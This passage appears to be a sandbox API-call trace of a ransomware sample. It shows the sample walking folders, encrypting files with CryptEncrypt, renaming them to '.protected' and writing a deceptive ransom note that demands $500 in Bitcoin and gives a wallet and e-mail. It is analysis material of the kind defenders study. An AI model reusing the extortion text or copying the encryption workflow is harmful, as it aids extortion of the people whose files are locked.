follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.862] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0073.863] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.863] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0073.863] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.863] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0073.863] CloseHandle (hObject=0xa4) returned 1 [0073.863] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0073.864] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="Windows") returned -1 [0073.864] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="Program Files") returned -1 [0073.864] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="Program Files (x86)") returned -1 [0073.864] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="$Recycle.bin") returned 1 [0073.864] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="System Volume Information") returned -1 [0073.864] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 71 [0073.864] lstrcmpW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2=".") returned 1 [0073.864] lstrcmpW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="..") returned 1 [0073.864] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*") returned 73 [0073.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0073.865] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.865] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.865] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.865] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.865] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.865] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\.") returned 73 [0073.865] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.865] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.865] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.865] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.865] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.865] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.865] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.865] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\..") returned 74 [0073.865] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.865] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.865] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.865] lstrcmpiW (lpString1="state.rsm", lpString2="Windows") returned -1 [0073.865] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0073.865] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files (x86)") returned 1 [0073.865] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0073.866] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0073.866] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 81 [0073.866] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0073.866] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0073.866] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0073.866] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0073.866] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.866] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 81 [0073.866] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0073.866] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 81 [0073.866] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0073.866] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 81 [0073.866] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0073.866] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x29a, lpOverlapped=0x0) returned 1 [0073.868] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.868] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x29a, lpOverlapped=0x0) returned 1 [0073.868] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.868] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0073.868] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0073.868] CloseHandle (hObject=0xb4) returned 1 [0073.868] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.protected") returned 91 [0073.868] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.protected" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.protected")) returned 1 [0073.900] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.900] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Windows") returned -1 [0073.900] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Program Files") returned 1 [0073.901] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Program Files (x86)") returned 1 [0073.901] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="$Recycle.bin") returned 1 [0073.901] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="System Volume Information") returned 1 [0073.901] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 88 [0073.901] StrStrIW (lpFirst="vcredist_x64.exe", lpSrch=".protected") returned 0x0 [0073.901] lstrcmpW (lpString1="vcredist_x64.exe", lpString2="RESTORE_FILES.txt") returned 1 [0073.901] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0073.901] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0073.901] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.901] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 88 [0073.901] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".txt") returned 0x0 [0073.901] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 88 [0073.901] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".rar") returned 0x0 [0073.901] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 88 [0073.901] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".zip") returned 0x0 [0073.901] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0073.995] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.995] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0073.996] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.996] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0074.002] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0074.002] CloseHandle (hObject=0xb4) returned 1 [0074.002] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.protected") returned 98 [0074.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.protected" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.protected")) returned 1 [0074.003] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0074.003] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0074.003] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RESTORE_FILES.txt") returned 89 [0074.003] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0074.005] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.005] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0074.006] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.006] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0074.006] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.006] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0074.006] CloseHandle (hObject=0xa4) returned 1 [0074.006] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0074.006] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="Windows") returned -1 [0074.006] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="Program Files") returned -1 [0074.006] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="Program Files (x86)") returned -1 [0074.007] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="$Recycle.bin") returned 1 [0074.007] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="System Volume Information") returned -1 [0074.007] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned 83 [0074.007] lstrcmpW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2=".") returned 1 [0074.007] lstrcmpW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="..") returned 1 [0074.007] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*") returned 85 [0074.007] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0074.007] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.007] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.007] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.008] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.008] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.008] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\.") returned 85 [0074.008] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.008] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.009] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.009] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.009] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.009] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.009] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.009] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\..") returned 86 [0074.009] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.009] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.009] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.009] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0074.009] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0074.009] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0074.009] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0074.009] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0074.009] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned 92 [0074.009] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0074.009] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0074.009] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*") returned 94 [0074.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0074.010] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.010] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.010] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.010] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.010] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.010] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\.") returned 94 [0074.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.010] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.010] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.010] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.010] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.010] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.010] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.010] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\..") returned 95 [0074.010] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.010] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.010] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.010] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Windows") returned -1 [0074.010] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files") returned 1 [0074.010] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files (x86)") returned 1 [0074.010] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="$Recycle.bin") returned 1 [0074.010] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="System Volume Information") returned 1 [0074.010] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned 113 [0074.010] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0074.010] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0074.011] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*") returned 115 [0074.011] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0074.011] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.011] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.011] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.011] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.011] lstrcmpiW 